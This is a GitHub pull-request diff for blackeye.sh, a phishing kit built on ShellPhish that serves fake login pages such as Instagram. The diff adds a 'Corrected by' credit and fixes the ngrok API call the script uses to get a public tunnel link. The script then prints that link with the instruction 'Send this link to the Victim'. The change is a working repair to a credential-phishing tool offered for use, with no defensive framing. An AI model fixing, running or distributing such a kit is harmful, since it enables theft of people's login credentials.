Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
3 changes: 2 additions & 1 deletion blackeye.sh
Original file line number Diff line number Diff line change
Expand Up @@ -2,6 +2,7 @@
# BLACKEYE v1.0 is an upgrade from original ShellPhish Tool (https://github.com/thelinuxchoice/shellphish) by thelinuxchoice under GNU LICENSE
# Coded by: @thelinuxchoice (https://github.com/thelinuxchoice/blackeye)
# Upgraded by: @suljot_gjoka (https://github.com/whiteeagle0/blackeye)
# Corrected by: CyberXCodder
# Credits (Copyright)
# Phishing Pages generated by An0nUD4Y (https://github.com/An0nUD4Y):
# Instagram
Expand Down Expand Up @@ -421,7 +422,7 @@ printf "\e[1;92m[\e[0m*\e[1;92m] Starting ngrok server...\n"
./ngrok http 3333 > /dev/null 2>&1 &
sleep 10

link=$(curl -s -N http://127.0.0.1:4040/status | grep -o "https://[0-9a-z]*\.ngrok.io")
link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
printf "\e[1;92m[\e[0m*\e[1;92m] Send this link to the Victim:\e[0m\e[1;77m %s\e[0m\n" $link
checkfound
}
Expand Down